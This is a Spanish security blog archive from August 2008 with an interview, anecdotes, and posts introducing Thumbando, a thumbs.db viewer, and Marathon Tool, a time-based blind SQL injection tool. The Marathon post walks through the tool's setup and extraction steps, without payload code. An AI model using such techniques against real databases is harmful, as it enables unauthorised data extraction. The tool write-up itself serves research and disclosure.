A Wolverine yo lo cuido bien. Me encantan los X-men, esa mutación que da poderes o capacidades especiales... Y Wolverine, Lobezno, Guepardo o Gloton, se llama en México, tiene para mí un atractivo especial, su historia, los experimentos que hicieron con él, aparece mucho la química y los metales, cosa que me encanta, esos recuerdos borrosos que le vienen en mente, esas garras de cuchillas que salen cuando se excita, su figura, ya sea como lo dibujan en diferentes comics, no solo en Marvel. Bueno, esas patillas, ese pelo salvaje, la fuerza y ese cuerpo tan duro y fuerte por el metal interno es una combinación excitante, ¿no habrá alguna tira erótica de Wolverine??

¿Habrá metal en otras partes que las pelis y los dibujos no mostraron? Debería ser metal líquido, o alguna aleación flexible ;-) Es que aparte me gusta el comic erótico, y me gusta dibujar, ya verás el dibujo que se me ha ocurrido, por no decirte el guión de la peli ;-). ¿Sabés que me gusta escribir y tengo mucha imaginación…?. ¿Pornos de superhéroes.....no hay? Witchblade, sale la peli, el 2009, estoy trabajando en este dibujo. Perdón por mi disgresión....vuelvo.

Cada usuario de wikipedia tiene su “lista de seguimiento”, donde ponés tus artículos a vigilar, y te marca cada vez que alguno de esos que controlás tiene un cambio. Y para hacerlo más fácil y más rápido existen scripts o herramientas, botoneras especiales para automatizar tareas, que te muestran el cambio o el historial sin necesidad de ir a la página del artículo. Al ser libre te podés crear tu propia herramienta, en javascript, en python, hay montones y para varias cosas.

8.- Vale, y ahora... ¿qué le lleva a una mujer cómo tú a meterse a revisar artículos en la wikipedia?

¿No serás machista, no? ¿Por ser mujer no puedo saber usar un wiki? Mirá que también me pongo a rackear servidores para mantener mi estado físico... Bueno, todo empezó cuando buscaba algo y no estaba, o estaba muy poco explicado, o tenía un error, y un link lleva a otro, y así y así y así se convierte en un vicio.

Justamente link quiere decir enlace, y ahí quedás enlazada, entre las páginas, libros, historias, averiguaciones, referencias, y es un vicio en serio, podés estar horas sin saber si es de noche o de día.

9.- ¿Qué debe decirle un gallego a una chica en argentina para que caiga rendida a sus pies?

No sé si decírtelo, después quedaremos todas vulnerables....a los ataques gallegos ;-). Pero te puedo decir lo que no se debe decir. Algo como: ”tú eres de aquí, conoces, a ver adonde me vas a llevar”....aunque no conozcas nada, debe caminar para cualquier lado, queremos que el hombre lleve el control de la situación, aunque después nos guste mandar.... Y otra cosa, hablar lento y menos borracho, que se entienda.... Ah, otra, en el momento que ya la consegua, en el momento hot que no diga: “¿ya te vas a correr?”, porque no significa lo que mismo.....y se rompe la magia!

10.- En el hemisferio sur el agua gira en sentido contrario al que gira en el hemisferio norte, ¿los besos con lengüa deben girar hacia un lado concreto también?

Lo del agua en el hemisferio sur y norte me tiene un poco mal, siempre que viajo al hemisferio norte, me olvido de verificarlo..... y con los besos, si cuando estás transando estás pensando en si la lengua gira como la espiral de debian o al revés, no vamos bien......no hay que pensar, que salga el descontrol, el regimen turbulento, libérate, luego vemos…..

11.- A ver, ¿a quién has conocido que te haya fascinado en este mundo?

Muchas personas, pero para resumir la idea, es la gente que hace las cosas con pasión, que se nota que ama lo que hace, y así avanza, crece, tiene ideas….

De la historia, los matemáticos y astrónomos griegos, árabes, Eratóstenes, el de la criba, Mersenne, Carmichael, gente que en esa época sin computadora ni calculadora armaron las bases de la teoría de números. Galois, el de los grupos, que de tan joven desarrolló su teoría, y murió en un duelo. Caravaggio, pintor renacentista, que era un genio aunque mucho tiempo estaba borracho, apostando, huyendo, el que pintó la famosa medusa, que está en Florencia, en la Galeria Uffizi, otro apasionado, cabezón, son ejemplos de apasionados por lo que hacen. Lovecraft, esas ideas, esa mente privilegiada, esa imaginación para escribir semejantes obras. Donald Knuth, el creador de TeX, que se encerró en un manicomio (no tengo la referencia real, aún) para que nadie lo moleste y escribir tranquilo sus libros El arte de programar.

Y si preguntás por gente que conozca personalmente, tengo amigos que para mí son capos, cerebros, cráneos, y son personas curiosas, que se ponen desafíos, siempre buscando algo.

Tuve un profe en la uni que me abrió más la cabeza cuando me enseñó estructura y gestión de datos, cómo optimizar para guardarlos, para buscar, para hacer un motor de base de datos, estaba re-loco, era un robot, una máquina. Y así conozco varias personas, muchas, que veo seguido saben mucho.

Bibliotecarios de Wikipedia saben mucho. Me fascina esa gente que sabe mucho, y que se nota que sabe, no son solo palabras, tienen ideas, que pueden cambiar cosas, hacen las cosas con amor, con pasión, con ganas, ese es el secreto de hacer cosas, “Hacer”.

Eso me fascina, también la gente que ayuda a que las cosas cambien, mejoren, la gente que ayuda a los pingüinos empetrolados, pobres, no me hagas acordar de tu tira de calentamiento global, ¡te odio! No vamos a desaparecer….

Los pilotos de avión de guerra de Malvinas, a algunos conocí en persona, como se arriesgaban y volaban bien bajo, porque las bombas a veces no explotaban y entonces tenían que tirarlas bien cerca del blanco, se la jugaban. Uff, y muchos más, capitanes de barcos, o personal marinero, especialmente de rompehielos, que van a la Antártida, o por mares tormentosos. Médicos, como Favaloro, que se les ocurrió como hacer un bypass para que el corazón siga funcionando.

También los que manejan bien, pilotos de rally o máquinas poderosas. Sentir el auto, tirar cambios de 3º a 5º, tirar rebajes, controlarlo en los derrapes. Caja manual, obvio, quiero manejar yo: linux. No caja automática: Windows ;-)

Hay mucha gente que me fascina, pero en síntesis, los que hacen....los ocurrentes, los retadores, los investigadores, los que crean, los que defienden sus ideas con fundamento, sus ideales. Lutero, que se rebeló contra la iglesia, contra los curas que cobraban para salvar almas. Snowy, un actor cantante de Therion, Yngwie, que volvió a ser un genio después del terrible accidente que tuvo con su Ferrari.

12.- ¿Qué es más dificil en Argentina, qué los políticos sean decentes o que la gente cumpla las normas?

Muy difícil esta pregunta, que un argentino cumpla las normas es difícil, pero políticos decentes, ¡esto es más difícil! Creo que un político al principio puede ser decente, uno que le guste la política, pero a medida que sube se va pudriendo, y si no se pudre o no entra en las trenzas, lo bajan....

Y las normas, ya en varias partes de la entrevista hay ejemplos de las normas que no se cumplen, cruzar la calle, ni los coches de policía las cumplen, ni ómnibus, ni taxis. El mismo taxista me contaba el otro día, que su agencia de taxis tiene un arreglo con la poli por las multas, la digo, la empresa es Gold. Yo quiero justicia.

13.- ¿Te gusta el fútbol? ¿De qué equipo eres?

Me gusta más el automovilismo, rally, nascar, camiones, pero sigo a mi equipo, uno de los que ganó más copas intercontinentales, boquita. Ya sabés si te da bronca, cambiá las copas en la página web, ahora en Argentina es delito, acaba de salir la ley.

14.- ¿Se puede diferenciar a un gallego sin que abra la boca para decir nada?

Gallegos sin hablar, sin escuchar esas linguales la c, la z. Es muy típico que acá se los carga por las cejas, peludos, en general, son muy cejudos, y mucho pelo.... ¿viste Manolito el amigo de Mafalda?

Y bueno, al menos con los que conozco, o veo en pelis, la regla se cumple con una alta probabilidad. Con esta se me enojan todos, ¿no? Bueno, tendré que ir allá a comprobarlo y hacer mi trabajo de investigación ;-)

15.- Ahora te has metido a currar también en la ekoparty con Francisco y Fede, los hackers de la Torre Eiffel, veo que tienes tiempo libre...¿de qué trabajas?

Pregunta larga, porque primero tengo que aclarar lo de la torre. Era fácil hackear la torre Eiffel, digamos que el formulario de acceso de datos no validaba bien lo que ingresaba a la base de datos de los telescopios, y una moneda de un euro es más cara que una de un peso (1 euro = $5 argentinos, casi)

En mi puesto de trabajo tengo 2 máquinas, una con win y una con debian y un mouse en cada mano, y así trabajo más rápido, es como tocar la batería o manejar, independizar los brazos y los procesos….(en vez de las piernas y los ritmos)

Tengo mis 4 o 5 instancias de firefox, con 27 solapas cada una, así puedo hacer varias cosas a la vez. Trabajar, leer, aprender, preparar la tesis, contestar mails, contestar solicitudes de wikimedia.ar, participar en foros, escribir para el blog, estudiar, hacer pruebas, organizar tareas y grupos, en fin, optimizar, es el secreto…. Organización y así se pueden hacer muchas cosas. Igual, me gustaría que los días fueran más largos que no alcanzan a todo. O las noches, para descansar…

Volviendo a la torre Eiffel y mis amigos del video, te cuento: Ekoparty, queremos que sea “La Conferencia” de Latinoamérica, dentro de las del estilo. Viene gente muy copada y reconocida del ambiente. Este año me enganché con la organización, aunque a los chicos ya los conocía y nos llevamos todos muy bien, es un placer. Acá voy poniendo toda la info de la eko.

Y aparte, del año pasado estoy con mi grupo wikimediano organizando wikimania 2009. Ganamos la candidatura después de una ardua pelea con ciudades de Canadá, Australia, entre las que llegaron a las últimas instancias. Así que, como ves, no estoy quieta, me gusta moverme, hacer, y es la vida, siempre con cosas en la cabeza….

16.- Te voy a regalar un Windows Vista, te lo has ganado, pero tienes que usarlo en las próximas reuniones de los Lug y contarme si te han pegado. jaja. Es broma, no te pegarán si llevas Vista, ¿verdad?

¡Ey!, ¡gracias! ¿Original?. Será mi primer windows original. De linux tuve cds originales, a pesar de ser free, pero windows nunca..... Lo voy a usar, te prometo, así puedo hablar mal, con conocimiento de causa ;-)

Es un chiste, claro, hay que conocer varios software si trabajamos en esto, ¿no? Y ya viste que la remera de Spectra Technet naranja que me regalaste me la puse...claro que tenía puesto mi crucifijo y la ristra de ajos por debajo....

Hablando en serio, ahora, no soy tan fundamentalista en el tiempo actual, para seguir evangelizando y mostrándole a la gente que hay otras cosas, es mejor acercarse con lo que conoce, es un cambio de estrategia, (mía), no de ideas.

17.- ¿Qué te pareció lo del calendario Tórrido de los MVPs de gallegolandia? ¿Te animas para un calendario de informáticas sexys en el 2009?

Me re-gustó el calendario tórrido, lo tengo colgado en mi casa. Siempre ves modelos, es más lindo ver a gente “normal”, que conoces, fue una buena idea, sobre todo por la donación… Y bueno, si es por buena causa, claro que se hace. Igual uds tenían los gallumbos puestos abajo de los carteles.....así es más fácil de aceptar.

Y si es por buena causa, por ejemplo esta, donaciones a wikimedia, dentro de poco se podrá donar a wikimedia.ar, nos falta un trámite ;-). Igual quiero algo a cambio, intercambio, me enseñás un poco para pasar al menos la fase 1 de un retohacking ;-)

18.- ¿Qué diferencia hay entre "Currar" en Argentina y "Currar" en España?

Ojo, currar acá suena muy feo, un día me dijiste que yo era una currante de wikipedia....uf, que mal me quedó. Después me enteré que currar mucho, en España, es trabajar mucho, acá currar es robar, figurar, aparentar que trabajás y no trabajás.
Ejemplo: “como estamos currando con esto”, quiere decir, “como estamos robando con esto”, o sea, haciendo dinero fácil, engañando a la gente.

19.- He oido muchas cosas, pero, cuantanos...¿cómo se suicida un Argentino?

¿Cómo se suicida un argentino? Uff, hay muchos chistes, porque somos soberbios, agrandados.... ¡¡Saltando desde una altura alta, igual a la de su ego!!!. Pero no sé, como acá somos unos salvajes, salís a la calle y enseguida encontrarás algo para “reventar”.

20.- Si te hicieran una oferta para trabajar en Spectra...¿Te vendrías al lado del mal?

¿Lado del mal?? Mmm, depende cual sería mi trabajo, estaría bueno, así puedo descubrir y llegar a verificar la teoría de la conspiración, ver los códigos fuentes, auditar código, ver las backdoors, los programas ocultos que tiene para espiarnos, los códigos que copian datos que reciben de los windows registrados para dar info a la NSA.

Como la famosa NSA_KEY, una variable que tenía en el registro, jajajam, ¡ohh! dijeron los de MS, es una casualidad que le hayamos puesto ese nombre.... Fue cuando la cryptoAPI versión 1, creo, ya en la versión 2 copió, o... se pareció más a la de Linux, como decís vos, que bueno el software libre, es abierto y todos lo copian, los de software libre trabajamos para los demás...¡qué te aproveche bien!

¿Creés que me dejarán trabajar en algo así? ¿Tipo detectivesco? Me podría infiltrar y revisar todo….copiar esos códigos, no, mejor no, no creo nos sirvan…. Es al revés :)

jueves, agosto 21, 2008

¡Tiempo!

La cultura del barrio es algo que sólo se mama cuando has bajado al parque todos los días por la tarde a tener las grandes discusiones. Sobre si los Manowar era mejor que los Helloween, sobre si Lars Ulrich tocaba mejor la batera que Nicko McBrain, si Gary Moore o Yngwie Malmsteen eran mejor o peor que Joe Satriani. Grandes Flames, sí señor.

Esas tardes en el banco, aprendiendo a fumar, recogiendo cascos de botellas para devolverlas y recibir las “pelas” que nos daban para poder comprar más priva, recogiendo cigarros a medias, desliando varios y volviendo a liar un cigarro con papel, están siempre en mi memoria. Fueron momentos en los que el ingenio había que agudizarlo para poder disfrutar el día.

ACTUALIZACIÓN: Mi primo Laggy me ha enviado este video que resume aquellos años.

De aquella época guardo mucha sabiduría, momentos y frases que siempre están en mi mente y me ayudan a no perder la senda cuando estoy un poco perdido en otros ambientes y hoy, me he acordado de una de ellas.

- “Si algún día no tienes tiempo ni para hacerte un paja, entonces estás jodido”

A ver.. .¿Cuándo fue la última vez? ¿Había empezado la Eurocopa? ¿O era la Olimpiada? …Me cago en tó lo que se menea. Estoy muy jodido. Pero la culpa no es mía. Es de esta vida. Tradicionalmente en agosto las cosas se ralentizan y uno tiene tiempo para hacer un montón de cosas, pero no, este agosto es diferente. ¿Cómo es posible que estemos en agosto y no tenga tiempo de nada?

No he tenido tiempo de sacar los chistes que se merecen al bug del Joomla 1.5 que me envió Alex junto con unos riquísimos pimientos de Padrón (es la nueva moda, enviar comida al Maligno, ¡Animáros! ;) ) dónde el fallo permite entrar en el sistema como Administrador simplemente … ¿metiendo una comilla?

No he tenido tiempo de acabar el paper ese que motivó el artículo de la Putilla de Vista (debo ser yo esa putilla), que, como diría mi primo Laggy, en verdad es un paper muy bueno. Aunque ya lo han revisado en Spectra (es lo que tiene ser MVP, te enteras de algunas cosas), en ARS Técnica y en Hispasec (pobres… han necesitado un poco más de tiempo que en la ciudad de los Kellog's).

A todo esto, liado hasta las cejas con unos artículos para unos congresos académicos, cuando llamo a algún compañero, amigo, colaborador, o sinvergüenza por teléfono me dice:

- “Pues me pillas en el chiringuito en Conil, con un sangría en la mano y unas gambas”

Pues yo me cago en la leche puta que tan dao de mamar, ¡¡cabrón!! Qué yo llevo levantándome a las 6 de la mañana toda esta semana, escribiendo más que el negro de Ana Rosa Quintana y con todo un año por delante.

Esto, hay que solucionarlo tajantemente. Ahora mismo me llevo el portátil, con la wifi al baño y me veo las últimas noticias deportivas y me relajo.

Saludos Malignos!

miércoles, agosto 20, 2008

Thumbando

Una de las cosas que muchas veces buscas o encuentras cuando realizas una auditoría web o un análisis forense es el ficherito de miniaturas de Windows. Este fichero en Windows XP/Server 2003 se llama thumbs.db y contiene las miniaturas de las imagenes de ese directorio.

El amigo Silverhack hace maravillas con las técnicas forenses en imagenes y siempre nos ha enseñado trucos en la oficina de lo que se puede hacer/encontrar en una miniatura, así que, Pedro Laguna se puso manos a la obra y nos ha preparado una aplicacion en la web para que podamos subir un fichero thumbs.db, o simplemente darle la URL del mismo y poder ver todas las miniaturas de forma cómoda.

Imaginá que llegas a una web y te encuentras el títpico lista de directorios con un montón de imagenes. Horror, hay que descargarlas todas o ir abriéndolas una a una.

Listado de directorio abierto con thumbs.db
En lugar de descargar todas las imagenes (si están) o verlas una a una abriendo cada archivo, podemos copiar la URL:

Copiar un enlace en super IE7
Le pasamos la dirección del Thumbs.db a Thumbando, que se encuentra en la siguiente URL: http://www.informatica64.com/thumbando

URL en Thumbando
Y thumbando nos devuleve una página con todas las miniaturas, el tamaño, el nombre y la fecha. Además, se pueden descargar todas en un .zip por si quieres trabajar con ellas en tu ordenador.

Resultados de Thumbando
Esta versión es para los thumbs.db, cuando Pedro Laguna tenga lista la versión para las miniaturas en Vista/2k8 os lo haremos saber.

¿El nombre? A mi no me digáis nada, es cosa de Pedro...

Saludos Malignos!

martes, agosto 19, 2008

Uff, pensé que se acababa el mundo!

Hola asesin@s,

a la vuelta de la Defcon, decidí irme a un sitio de esos con poca cobertura, así que, entre unas cosas y otras me he pasado medio mes sin poder estar atento a todo lo que sucedía.

Tras llegar, me ecuentro con uno de los peores artículos técnicos de seguridad que he leido en mucho tiempo, que merece las palabras de uno de los autores del famoso paper, en la que se mezclan conceptos por error o porque directamente no se ha dedicado a leer el artículo orginal y en el que me sorprende encontrar de nuevo, el famoso informe de Gartner que nuestro amigo Marcelino Madrigal nos descubrió.

Tras el susto inicial y después de leerme casi completo ya el paper de los investigadores (ya os pondré mis conclusiones) paso a encontrarme que mi querido Ubuntu 8.0.4 ha sido elegido como el mejor Linux de escritorio del mundo mundial por Linuxworld. El señor me perdone, pero... ¡¡¡¿cómo serán los otros?!!! ¿Será mejor la Wifi? ¿Serán mejor los atajos de teclado?

Ubuntu 8.0.4 el más mejol
Después de sufrir con la Wifi y los accesos de teclado, creo que ya entiendo porque Windows Vista ya está por el 17 % de cuota de mercado mundial mientras entre el campeón y los demás compañeros están sumando un 0.82 % de la cuota de mercado, es decir, algo así como que Windows Vista tiene 20 veces más cuota de mercado que todos los linux de escritorio del mundo.

Estádisticas de Marketshare Julio'08
Gracias a Spectra el mundo no se acaba.

Saludos Malignos!

lunes, agosto 18, 2008

Cagadas III

Durante varios años José Parada y yo, ayudados en algunas ocasiones por Juan Luís Rambla o David Cervigón, estuvimos realizando una campaña que se llamaba Security On Site. Esto consistía en pasar un día con el equipo de seguridad de algún sitio.

En una de estas, acabamos llegando a uno de esos sitios secretos en los que no se puede entrar ni con teléfono móvil y dónde nada es lo que parece (Lo siento, si os doy más información tendría que mataros).

El caso es que estábamos allí, en el segundo control, móviles out, conexiones quitadas, control de metales pasado y comprobados todos nuestros antecedentes, cuando el abuelo y yo nos miramos extrañados.

- “Esto es la polla, macho”.
- “Ya te digo, es como de película, ¿no?”
- “Sí, y lo más divertido es que nos darán nombres falsos y todo”
- “Seguro que sí.”

En esas estábamos cuando entramos y nos recibió uno de los empleados que nos dijo:

- “Hola, me llamo Marcelino”

A mí, recordando la conversación anterior, me hizo gracia la situación y dejé que saliera el chiste sin filtrarlo:

- “Claro, hoy te llamas Marcelino y mañana puedes ser Pedro”.

El empleado me miró de arriba abajo y totalmente serio me dijo:

-“A ti se te ve muy gracioso, ten cuidado no salgas con las piernas rotas”

El abuelo se descojonó, el empleado no hizo ni la más mínima mueca en la cara y yo me quedé helado. Desde ese momento me quedé pensando: “Si ha sido un chiste este tipo es un cráck, si no ha sido un chiste me ha acojonado de verdad”.

Así que…decidí pensar que había sido un chiste y seguir adelante. De otra forma me habría hecho caquita en los calzones.

Saludos Malignos!

Cagadas II

Había sido una noche larga y dura, que terminó demasiado tarde. Demasiado tarde para dar una charla al día siguiente. El alcohol aún estaba en la sangre cuando me tocó charlar, y creo que me salió “la peor charla de la historia”, pero creo que esto ya os lo he contado tiempo ha. Era en Vigo, y a la vuelta, resacoso perdido, con la caraja y las ojeras negras cogí el Malignomovil I de vuelta a casa.

El aspecto que llevaba encima era digno de ver, con las melenas sucias, la barba de dos semanas, la ropa arrugada, una cinta al pelo y las gafas de sol naranjas en el Malignomovil I, que era un coche, cuanto menos llamativo.

No es de extrañar que cuando pasé el peaje de A6 llamara la atención de los Guardias Civiles que hacen guardia allí:

- “Buenas tardes, documentación”
- “Aquí tiene agente, ¿algún problema?”
- “Nada, es un registro preventivo de armas y drogas. ¿lleva algo?”
- “Eh,… uh…no...”
- “Abra el maletero por favor”

Y allí me dirigí yo, a abrir el maletero del Malignomovil I y vaya, de repente aparecen en el maletero un par de pelucas y un par de hachas de metro y medio que habíamos utilizado en los disfraces de la Codecamp.

La cara del guardia civil fue un poema. Dio un rápido paso atrás al tiempo que se echaba la mano a la cartuchera. En ese momento, a los ojos del agente, debí parecer… cualquier cosa. Desde luego no era lo que esperaba encontrarse en ese maletero. Su boca, tensa, rápidamente me lanzó una pregunta inquisitiva:

- “¿yestoquees?”

Vaya, ¿y ahora que contesto yo? ¿Me busco una realidad más plausible que la realidad?¿Acabaré en el calabozo? Bueno, de perdidos al rio, vamos con la verdad por delante…

- “Es que soy ponente”

No sé si fue al mejor de las respuestas, pero parece que el agente no le quedó muy claro lo que yo había querido decir con eso de “Ponente”. El caso es que pestañeó un par de veces, miro a su compañero, miro las hachas y las pelucas y dijo perplejo:

- “Ponente…¿de qué?”

Nunca se me olvidará la forma y el tono que usó para hacer esa pregunta con tanta injundia. Vale, llegó la hora de las explicaciones:

- “Bueno, damos charlas de informática y a veces nos disfrazamos, hacemos un poco de teatrillo y…”

El agente miró a su compañero, comprobó que las hachas eran de plástico, se rió por lo bajini, me miró de arriba abajo, se volvió a reir… y siguió con el registro.

Al final del registro, resulta que el agente encontró… ¡uy!, mira que tarde que es y yo aquí aún. Bueno, los que os habéis tomado unas cervezas conmigo ya sabéis como acabó esta historia. A los demás…

Saludos Malignos!

domingo, agosto 17, 2008

Gracias a los Borbones el Reto Hacking IX

Esto de organizar los retos hacking es que permite elegir la fecha de comienzo. En el mes de Julio el Reto Hacking VIII [Solucionario] y el Reto de BlindSec se distanciaron sólo en unos días, lo que no impidió que los ganadores se pegaran en ambos frentes.

Una vez más, nuestro querido y nunca bien valorado amo RoMaNSoFt tuvo problemas para estar en la línea de salida a tiempo y poder disputar la pelea con Dani Kachakil, Bambú, Samsa, Palako y demases jugadores.

Yo, que cómo ya sabéis estoy en el camino de la santidad, no quiero dejar al pobre RoMaNSoFt sin la ocasión ideal para que pueda conseguir su primer entorchado, así que, esta vez, antes de poner la fecha del Reto Hacking VIII he llamado a su representante.

- “¿Dígame?”
- “Sí, hola, verá, soy el Maligno y querría hablar con su excelencia el señor Don Romano”
- “Mire, el señor no atiende fans, periodistas y/o admiradores salvo los jueves de 10 a 11, si quiere una cita, le puedo pasar con mi secretaria, para que le dé una cita con la secretaria del señor y ya verá ella si puede atenderle. Creo que tenía un hueco en el 2009”
- “¿2009? ¿No tiene el señor ningún hueco en el 2008?”
- “Tenía un hueco, porque había decidido no asistir a la cena homenaje que le daba el Rajá, pero creo que ha accedido cenar con los Borbones, que ya llevaban 2 años en lista de espera”.
- “Vaya… ¿y…si me hago fologüel de su twitell?”

No os podéis imaginar lo que ha costado conseguir la cita para el 2008 (y lo mal que se lo han tomado los Borbones, que como despecho se han ido a Beijing). He tenido que acceder a favores sexuales con la secretaria de la secretaria de la secretaria del señor. Y a la secretaria al cubo llamarla fea es un piropo.

Pero…¡tengo la fecha!, así que, el próximo día 12 de Septiembre de 2008 a las 20:00, gracias al sacrificio de los Borbones, y a las buenas artes de uno con la secretaria al cubo, dará comienzo el Reto Hacking IX.

Todos podéis jugar e intentar ganar, pero esta vez, creo que será el reto del señor, pues, no hay nada que disturbe su capaz intelecto, así que os va a dar una pana…¿o no?

Sí, algunos podéis pensar que así se las ponían a Felipe II, pero es que mientras David Carmonix, Mandingo y Kachakil tienen alguna estrella en la camiseta de haber ganado algún entorchado, nuestro amigo el señor tiene una camiseta de Danone que sacó por puntos en las tapas y un Windows 98.

Así que todos los que no tenéis camiseta con estrellita y, como el amigo RoMaNSoFt, la tenéis de Telepizza, de Gillette, Spectra o la Ostra Azul, poneos a estudiar que en Septiembre llegan los exámenes de recuperación.

Saludos Malignos!

PD: Todos los que os hayais leído los posts de los tres primeros meses del año ya sabéis de que va a ir, así que nada, ¡enhorabuena a los ganadores!

sábado, agosto 16, 2008

Dignidad literaria

A lo largo de los camino-de-tres años que tiene este blog varias veces me han dicho eso de: “este post no es digno de estar en este blog” o “este post no da el nivel” o “no deberías haber puesto este post” o “este post es malo vuelve a los otros”.

La primera vez que recibí un mensaje así me quedé pensando, “¡Coño! ¿Hay alguno que no sea pura bazofia?”. Sí, ya sabemos que esto de bloggear tiene mucho de egolatría, pero cuando nació este blog, fue como una forma de guardar argumentos que muchas veces me habían dicho en charlas, reuniones, conferencias, etc…

La cosa empezó a desvariar y se convirtió en esto, un refrito de … cosas. Unas veces unos me dicen que les gustan los retos, otros que si me meto mucho con Linux, otros que les molan los artículos de opinión sobre las cosas y me mandan para que dé mi punto de vista sobre ciertas noticias, otros directamente quieren el cachondeo y la salsa rosa, a otros les gustan las conferencias y los tutoriales técnicos, y otros simplemente vienen a ver qué opina "el enemigo".

Al final El Lado del Mal es un refrito de cosas que escribe una persona que soy yo sobre lo que le pasa por la cabeza. Unas veces pongo el vídeo del anuncio de cocacola y otras hablo de Los Soprano porque me ha parecido chulo. Otras veces le hago una entrevista a un tipo interesante y otras simplemente publico el último dibujo que me ha salido. Algunas veces es un llamamiento de ayuda este blog y otras es una forma de desahogarme contra tanto tonto suelto que hay por ahí siendo un técnicoless.

¿Qué un post no es digno? Pues mentira, creo que todo lo que he puesto es tan digno de mi como yo, porque lo he puesto yo. Cuando he estado borracho perdido tirado en una esquina era yo, igual que cuando he estado ayudando a una ONG. Era yo el que decía tacos y palabras malsonantes y era yo el que se ha cruzado media España para dar una charla a un grupo de estudiantes.

A mí me alegraría levantarme por las mañanas y saber qué es lo que va a gustar a todo el mundo, pero no lo sé. Lo único que sí que sé es que, ponga lo que ponga a alguno no le va a gustar así que… nunca he pensado en nadie cuando escribo un post. Escribo lo que me sale de… dentro. ¡Qué ya me iba a salir la rama Bronxtolita y no quiero!

Si tienes preferencia por algún tipo de post, pues está genial incluso que me lo digas, porque así tendré más feedback. Si te gusta uno u otro, pues mejor, pero El Lado del Mal es lo que es y sin aires de pretender ser nada más.

“¿y si no me gusta este post?”

Pues como decía el gran Robe Iniesta... pues te jodes!

Saludos Malignos!

viernes, agosto 15, 2008

Litter

Lo reconozco, soy un poco maniático, y con la edad me hago mucho más maniático. Entre las manías que tengo hay algunas cosas que me sacan de quicio llegando a meterme hasta en fuertes discusiones con quién las incumplen. Una de ellas es la gente que no respeta dónde vive ni los lugares que visita. Para ellos, va este mensaje:

¡CERDO!
No soporto la gente que tira las cosas al suelo, el cerdo máximo es el que vacía el cenicero del coche en cualquier rincón de la calle o el que tira cosas por la ventanilla del coche. Te lo repito por si no los entendido:

¡CERDAZO!
Muchos de ellos utilizan expresiones como: "Ya lo limpiarán" o "Para eso los pagamos". No seas cerdo, también pagamos a la policía para que detenga a la gente que da palizas y no quieres que nadie te dé una paliza.

Cuida tu entorno y si no, cuida el mio. Si quieres tirar algo al suelo, hazlo en tu puñetera casa.

¡CERDO!
Saludos Malignos!

Camino a la Santidad

Queridos feligres@s,

Aprovechando este día de festividiad religiosa, he de contaros que he visto la luz. Sí, he visto el camino hacia una nueva era de paz, armonia y enamoramiento con la bondad. Yo, destacado miembro Apple Free, que dejé de comer la Granny Smith porque después del primer bocado me sentía mal al cambiar radicalmente la forma y el sabor de tan suculento manjar al inicio, he comenzado a andar la senda del bien.

Después de ser un "destacado miembro" (de hecho creo que sé exactamente que miembro soy) de la comunidad del bien, después de haber escrito algunos tutoriales de nuestro querido Ubuntu 8.04 [La Wifi en Ubuntu 8.04 y Atajos de Teclado en Gnome+Ubuntu 8.04] y Apache [Fortificación Apache], después de ayudar a securizar herramientas open source y después de propulsar nuestro primer proyecto de código abierto [Marathon Tool], he decidio dar un paso más en esta senda.

Así, en octubre, dentro de la Open Source World Conference, presentaremos un trabajo sobre los Metadatos en OpenOffice y una herramienta para limpiar de metadatos e información oculta los ficheros de OpenOffice. En este trabajo, hay que destacar el esfuerzo de Enrique Rando y nuestro amigo/compañero "Thor" que han aportado esfuerzo y dedicación en él.

Será un día de jubilo, bajar a Málaga, ver a los amigos de esa ciudad que el 25 de ocutbre de hace casi 127 años vio nacer a tan ilustre pintor y presentar el trabajo entre la comunidad.

Me voy a comprar muchas camisetas, y me voy a tirar muchas fotos y va a ser divertido aprender e intercambiar conocimientos. ¿Alguien planea ir por allí? ¿Hace la noche antes una quedada?

Saludos ¿Malignos?!

jueves, agosto 14, 2008

Marathon Tool

La técnica de Time-Based Blind SQL Injection using Heavy Queries necesitaba una POC, así que había que realizar una herramienta que sacara partido de esto. Yo tenía más o menos escrito como quería hacerlo cuando Dani Kachakil me dijo algo como: "Ey, ¿puedo ir haciendo algo por ahí?".

De ahí surgió Marathon Tool, una herramienta que extrae datos de bases de datos a través de vulnerabilidades Blind SQL Injection explotadas en base a tiempos, es decir, si la respuesta es larga es Verdad y si la respuesta es corta es Falso, pero utilizando consultas pesadas. En las siguientes diapositivas, utilizadas en la Defcon, está un resumen de todo esto.

Time-Based Blind SQL Injection using Heavy Queries

View SlideShare presentation (tags: parada josé alonso chema)

La herramienta está en versión alpha aun, pero es funcional en varios entornos y útil para explotar casi todas las situaciones.
Ahora mismo está preparada para MS SQL Server, Oracle, MySQL, MS Access 97/2000 y MS Access 2003/2007. Como se puede ver en la siguiente imagen, se configura de forma muy similar a Absinthe, es decir, primero la URL, luego los parámetros y se selecciona que parámetro es injectable. Las opciones permiten configurar cookies, sistemas de autenticación y un servidor proxy.

Configuración Injección
Como el método de extracción de datos basado en tiempos es bastante lento, la herramienta permite configurar varios parámetros para conseguir mejores rendimientos, así, primero se define que diferencia en tiemnpo debe haber entre una consulta Falsa y una consulta Verdadera. Esto le hará a la aplicación ir añadiendo copias de la tabla seleccionada a la consulta pesada para generar un mayor retardo en consultas TRUE. El resto de los parámetros son bastante sencillos de entender ya que son las pausas entre consultas, la pausa después de ejecutarse una consulta pesada (un valor TRUE), el número de tablas a probar, el time-out, etc...Como se puede ver, por defecto, cuando se selecciona un motor de bases de datos se utilizan unas tablas para intentar generar consultas pesadas, pero es editable y se puede utilizar cualquier tabla conocida o adivinada.

Parámetros de ajuste
Después de configurar el entorno, se inicializa la aplicación y se puede extraer el usuario o la extructura de la base de datos.

Extracción de datos
En caso de ser seleccionado un motor de base de datos MS Access, al no disponer en este de un diccionario de datos, se debe especificar la tabla y la columna de la que se quieren extraer valores.

La herramienta cuenta con un sistema de logs muy cómodo que permite distintos nivels de detalle. Si se selecciona el nivel 90 se verá, por ejemplo, un resumen de lo que la aplicación está realizando, y si se selecciona el nivel 100 se verán todas y cada una de las peticions al servidor web que se están realizando.

Sistema de Logs
La herramienta la está controlando ahora el bueno de Alekusu y está publicada, junto con el código fuente, en Codeplex. Está desarrollada en .NET utilizando Visual Basic.

A día de hoy está en versión alpha, funciona, pero no hemos podido realizar todas las pruebas necesarias, asi que, cualquier sugerencia, duda, o error que encontréis será bien recibido para poder mejorarla poco a poco. Descárgala de esta URL: Marathon Tool

Saludos Malignos!

miércoles, agosto 13, 2008

Eyacule con cuidado

Hol@ a tod@s...otra vez,

